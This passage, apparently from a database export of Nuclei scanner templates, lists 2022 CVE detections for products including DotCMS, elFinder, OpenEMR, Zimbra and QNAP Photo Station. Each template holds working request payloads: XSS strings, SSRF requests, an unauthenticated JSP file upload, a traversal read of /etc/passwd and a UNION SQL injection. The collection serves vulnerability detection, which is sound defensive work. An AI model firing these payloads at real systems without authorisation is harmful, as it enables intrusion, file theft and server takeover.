attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Yonyou U8 13.0 application.\n reference:\n - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26263\n - http://yonyou.com\n - https://www.yonyou.com/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-26263\n cwe-id: CWE-79\n epss-score: 0.00147\n epss-percentile: 0.49736\n cpe: cpe:2.3:a:yonyou:u8\\+:13.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n vendor: yonyou\n product: u8\\+\n google-query: inurl:/u8sl/WebHelp\n tags: cve,cve2022,yonyou,xss\nheadless:\n - steps:\n - args:\n url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,\"%27\"><xsstag>()locxss\")#javascript:console.log(document.domain)'\n action: navigate\n\n - action: waitload\n matchers:\n - type: word\n words:\n - '<frame src=\"javascript:console.log(document.domain)\"'\n - 'webhelp4.js'\n condition: and\n# digest: 4a0a00473045022100e37ad372599828f388758737187d39f7af6d209982640bfacb36de3f07030964022067f4aade34d620cefe075b649af02f725b844531387823be6fa1576f1e9e53cf:922c64590222798bb761d5b6d8e72950", "hash": "f782c532df25c629d5bf1ed020c9d35a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e7" }, "name": "CVE-2022-2627.yaml", "content": "id: CVE-2022-2627\n\ninfo:\n name: WordPress Newspaper < 12 - Cross-Site Scripting\n author: ramondunker,c4sper0\n severity: medium\n description: |\n WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 12\n reference:\n - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2627\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2627\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45193\n cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: tagdiv\n product: newspaper\n framework: wordpress\n publicwww-query: \"/wp-content/themes/Newspaper\"\n tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n\n payloads:\n xss_payload:\n - \"--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - <form><math><img onerror=alert(document.domain) src=1><mtext>\n - td-block-\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220089ea67dd284fdc9cb5f8561b1d4bfc2fa8b0ba255e1fe4da91db549c933880402206b98099cbbb46f8c4ce87cdf7839a7b3cbd0a01ebb6f36669538d9351f172edd:922c64590222798bb761d5b6d8e72950", "hash": "acb70a8dd7caef2324aad2698fc8ac67", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e8" }, "name": "CVE-2022-2633.yaml", "content": "id: CVE-2022-2633\n\ninfo:\n name: All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery\n author: theamanrawat\n severity: high\n description: |\n WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.\n impact: |\n An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access, data leakage, or further attacks.\n remediation: |\n Update to the latest version of the All-In-One Video Gallery plugin (2.6.0) or apply the vendor-provided patch to fix the SSRF vulnerability.\n reference:\n - https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994\n - https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html\n - https://wordpress.org/plugins/all-in-one-video-gallery/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2633\n - https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/video.php#L227\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N\n cvss-score: 8.2\n cve-id: CVE-2022-2633\n cwe-id: CWE-610\n epss-score: 0.07008\n epss-percentile: 0.93291\n cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: plugins360\n product: all-in-one_video_gallery\n framework: wordpress\n tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n GET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Interactsh Server'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fcebc0ac370343abe355e7614907c5509aac8829c54ec69fbb1cd431e47446360220544f9db0b51c5835c7d02a72638915b7193db115f552f9def24248d6cedf3831:922c64590222798bb761d5b6d8e72950", "hash": "697ffae318b1f1b527e142acf5ca7454", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084e9" }, "name": "CVE-2022-26352.yaml", "content": "id: CVE-2022-26352\n\ninfo:\n name: DotCMS - Arbitrary File Upload\n author: h1ei1\n severity: critical\n description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/\n - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352\n - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html\n - https://groups.google.com/g/dotcms\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-26352\n cwe-id: CWE-22\n epss-score: 0.97527\n epss-percentile: 0.99989\n cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dotcms\n product: dotcms\n tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive\n\nhttp:\n - raw:\n - |\n POST /api/content/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n --------------------------aadc326f7ae3eac3\n Content-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\n Content-Type: text/plain\n\n <%\n out.println(\"CVE-2022-26352\");\n %>\n --------------------------aadc326f7ae3eac3--\n - |\n GET /{{randstr}}.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"CVE-2022-26352\")'\n - 'status_code_2 == 200'\n condition: and\n# digest: 4a0a004730450221009c0b8e26c1757e843516d1eb93bbf57c5a4c28cc367a24ab2913efc1c620261f02203b7f5ecae948b47821751b0eb7531ddf83eceedbcf0ad01c51e5710a9da998bb:922c64590222798bb761d5b6d8e72950", "hash": "6b6811d9c15ff4e29ba1a5a5f6e076a7", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ea" }, "name": "CVE-2022-26564.yaml", "content": "id: CVE-2022-26564\n\ninfo:\n name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting\n author: alexrydzak\n severity: medium\n description: |\n HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://rydzak.me/2022/04/cve-2022-26564/\n - https://www.hoteldruid.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26564\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-26564\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.39401\n cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: digitaldruid\n product: hoteldruid\n shodan-query: http.favicon.hash:-1521640213\n tags: cve,cve2022,hoteldruid,xss,digitaldruid\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>'\n - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1'\n - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"<script>javascript:alert('XSS')</script>\"\n - \"HotelDruid\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cce687826fa0938f4944c77a726102f036638a7225beea50d91d7f4aba881ee4022100d38d31a915a08dd7ac2ccff9c5cdb5683ccf782cc375359389be457f415998d9:922c64590222798bb761d5b6d8e72950", "hash": "bd36ceb052ef50a9bff40ae6ecef6d86", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084eb" }, "name": "CVE-2022-26833.yaml", "content": "id: CVE-2022-26833\n\ninfo:\n name: Open Automation Software OAS Platform V16.00.0121 - Missing Authentication\n author: true13\n severity: critical\n description: |\n An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the affected system.\n remediation: |\n Apply the latest security patch or update to the Open Automation Software OAS Platform V16.00.0121 to fix the missing authentication issue.\n reference:\n - https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1513\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26833\n - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1513\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H\n cvss-score: 9.4\n cve-id: CVE-2022-26833\n cwe-id: CWE-306\n epss-score: 0.0166\n epss-percentile: 0.87336\n cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: openautomationsoftware\n product: oas_platform\n tags: cve2022,cve,oas,oss,unauth,openautomationsoftware\n\nhttp:\n - raw:\n - |\n POST /OASREST/v2/authenticate HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n Connection: keep-alive\n Content-Type: application/json\n\n {\"username\": \"\", \"password\": \"\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"status\":'\n - '\"data\":'\n - '\"token\":'\n - '\"clientid\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008b2b1617febe8dccc10821928bbfc6ef217f8c13d190a4e1331680c32dce97eb02206ef9889f401735822755bfeff09044d1c95a75aaa4f9225590a5d412ec8ef929:922c64590222798bb761d5b6d8e72950", "hash": "0b0e6f0e64edeaddb3db79e89992eed5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ec" }, "name": "CVE-2022-26960.yaml", "content": "id: CVE-2022-26960\n\ninfo:\n name: elFinder <=2.1.60 - Local File Inclusion\n author: pikpikcu\n severity: critical\n description: |\n elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability.\n reference:\n - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html\n - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db\n - https://www.synacktiv.com/publications.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26960\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2022-26960\n cwe-id: CWE-22\n epss-score: 0.85922\n epss-percentile: 0.98481\n cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: std42\n product: elfinder\n tags: cve2022,cve,lfi,elfinder,std42\n\nhttp:\n - raw:\n - |\n GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b51a2dee0a9598c7c1f521f9373c5bb35728dda0693010a4db82ab044f7124d4022006a5200a4741c2b9c8d1102b86fd448d48abe1e0af4e543f0ea00920ed47e9ee:922c64590222798bb761d5b6d8e72950", "hash": "1f13fa5afc5a792293dff1a04d302650", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ed" }, "name": "CVE-2022-2733.yaml", "content": "id: CVE-2022-2733\n\ninfo:\n name: Openemr < 7.0.0.1 - Cross-Site Scripting\n author: ctflearner\n severity: medium\n description: |\n Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Openemr to version 7.0.0.1 or later to mitigate this vulnerability.\n reference:\n - https://huntr.dev/bounties/25b91301-dfb0-4353-a732-e051bbe8420c/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2733\n - https://github.com/openemr/openemr/commit/59458bc15ab0cb556c521de9d5187167d6f88945\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2733\n cwe-id: CWE-79\n epss-score: 0.00143\n epss-percentile: 0.49164\n cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: open-emr\n product: openemr\n shodan-query: title:\"OpenEMR\"\n tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr\n\nhttp:\n - raw:\n - |\n POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{RootURL}}/interface/login/login.php?site=default\n\n new_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n - |\n GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<img src=a onerror=alert(document.cookie)>'\n - 'pricelevel'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022067808d2ef89464f8783342be709967c65dd881e44614eb5c38c240f26f031a7c02201f9e9db2f41292d877197f390bc061a2bf455dc58d83e13a92b5baa0612b7cc4:922c64590222798bb761d5b6d8e72950", "hash": "0d76656e3b4313d1c9e1188f14739114", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ee" }, "name": "CVE-2022-2756.yaml", "content": "id: CVE-2022-2756\n\ninfo:\n name: Kavita <0.5.4.1 - Server-Side Request Forgery\n author: theamanrawat\n severity: medium\n description: |\n Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further attacks.\n remediation: Fixed in 0.5.4.1.\n reference:\n - https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216/\n - https://github.com/kareadita/kavita\n - https://github.com/kareadita/kavita/commit/9c31f7e7c81b919923cb2e3857439ec0d16243e4\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2756\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-2756\n cwe-id: CWE-918\n epss-score: 0.01579\n epss-percentile: 0.87037\n cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: kavitareader\n product: kavita\n shodan-query: title:\"kavita\"\n tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader\n\nhttp:\n - raw:\n - |\n POST /api/account/login HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/plain, */*\n Content-Type: application/json\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n - |\n POST /api/upload/upload-by-url HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/plain, */*\n Authorization: Bearer {{token}}\n Content-Type: application/json\n\n {\"url\":\"http://oast.me/#.png\"}\n - |\n GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\n Host: {{Hostname}}\n Authorization: Bearer {{token}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - Interactsh Server\n\n - type: word\n part: header\n words:\n - image/png\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: token\n group: 1\n regex:\n - '\"token\":\"(.*?)\"'\n internal: true\n\n - type: regex\n name: filename\n group: 1\n regex:\n - coverupload.(.*?).png\n internal: true\n# digest: 4b0a0048304602210085857e4680115374eb6a9159f4e37003a795b63ad4ad57ea849bb25b04ec899c022100ceac60030e13ddb109cf88cfcaf3066ff8140a87aed39031c9429979c6d07952:922c64590222798bb761d5b6d8e72950", "hash": "090bfbd573c59f083bc2aa67fc55aa08", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ef" }, "name": "CVE-2022-27593.yaml", "content": "id: CVE-2022-27593\n\ninfo:\n name: QNAP QTS Photo Station External Reference - Local File Inclusion\n author: allenwest24\n severity: critical\n description: |\n QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.\n remediation: |\n Apply the latest security patches and updates provided by QNAP to fix the local file inclusion vulnerability in QTS Photo Station.\n reference:\n - https://attackerkb.com/topics/7We3SjEYVo/cve-2022-27593\n - https://www.qnap.com/en/security-advisory/qsa-22-24\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27593\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\n cvss-score: 9.1\n cve-id: CVE-2022-27593\n cwe-id: CWE-610\n epss-score: 0.56352\n epss-percentile: 0.97624\n cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: qnap\n product: photo_station\n shodan-query: title:\"QNAP\"\n tags: cve2022,cve,qnap,lfi,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php.\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: response\n words:\n - \"!function(p,qa){\"\n - \"module.exports\"\n - \"application/javascript\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022029ff7ca9eec78f978cca636c260d69c4dd0975c46068c8d981049465b985c390022100d935e9c82c8fbb7d5cf9b1a5ffaef6ff36ceb942e8d2df6a703342de6a8c829e:922c64590222798bb761d5b6d8e72950", "hash": "9d7ea7bc9c163b1e54dce59128867863", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f0" }, "name": "CVE-2022-27849.yaml", "content": "id: CVE-2022-27849\n\ninfo:\n name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability\n author: random-robbie\n severity: high\n description: |\n WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages.\n remediation: |\n Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability.\n reference:\n - https://wordpress.org/plugins/simple-ajax-chat/#developers\n - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27849\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-27849\n cwe-id: CWE-200\n epss-score: 0.00713\n epss-percentile: 0.80067\n cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: plugin-planet\n product: simple_ajax_chat\n framework: wordpress\n google-query: inurl:/wp-content/plugins/simple-ajax-chat/\n tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"Chat Log\"'\n - '\"User IP\"'\n - '\"User ID\"'\n condition: and\n\n - type: word\n part: header\n words:\n - text/csv\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ac201e5da2db9585d76d187f6a6ede0350f1c6230c3c80676234cb41a9e8259022037d381d175e583e6490612c81f07c12a325a2dc7252ba6dcc9f5d27cc59d94d2:922c64590222798bb761d5b6d8e72950", "hash": "5c6b03240ae5408acab66dd28351da4e", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f1" }, "name": "CVE-2022-27926.yaml", "content": "id: CVE-2022-27926\n\ninfo:\n name: Zimbra Collaboration (ZCS) - Cross Site Scripting\n author: rootxharsh,iamnoooob,pdresearch\n severity: medium\n description: |\n A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Zimbra to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27926\n - https://wiki.zimbra.com/wiki/Security_Center\n - https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24\n - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-27926\n cwe-id: CWE-79\n epss-score: 0.91614\n epss-percentile: 0.98683\n cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zimbra\n product: collaboration\n tags: cve,cve2022,zimbra,xss,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<img src=x onerror=alert(document.domain)>Title???'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a1b0cf5101917cedd767e55813f4fda7435be450388a3f0676ddc42e7cb029a5022100db84abf0b399ac4fe86c377eff7301138cc347dfaf7f20244626e67bd02e9945:922c64590222798bb761d5b6d8e72950", "hash": "e4656d16686e1f386a61ef5c85d87dda", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f2" }, "name": "CVE-2022-27927.yaml", "content": "id: CVE-2022-27927\n\ninfo:\n name: Microfinance Management System 1.0 - SQL Injection\n author: lucasljm2001,ekrause\n severity: critical\n description: |\n Microfinance Management System 1.0 is susceptible to SQL Injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927\n - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip\n - https://www.exploit-db.com/exploits/50891\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27927\n - https://www.sourcecodester.com/php/14822/microfinance-management-system.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-27927\n cwe-id: CWE-89\n epss-score: 0.10451\n epss-percentile: 0.94459\n cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: microfinance_management_system_project\n product: microfinance_management_system\n tags: cve,cve2022,microfinance,edb,sqli,microfinance_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022100f2330cc77d89bc9dfac599714252cb298c5cb445f575714fdaa3d22ce52302d0021f4591789a7daf3fbe297cb9f3ea7331553a85261ca6027546cac70619c403fa:922c64590222798bb761d5b6d8e72950", "hash": "0dc4e62f71c9ada726ebd20764bd7ca8", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f3" }, "name": "CVE-2022-27984.yaml", "content": "id: CVE-2022-27984\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.\n remediation: |\n Apply the latest patch or upgrade to a newer version of Cuppa CMS that addresses the SQL injection 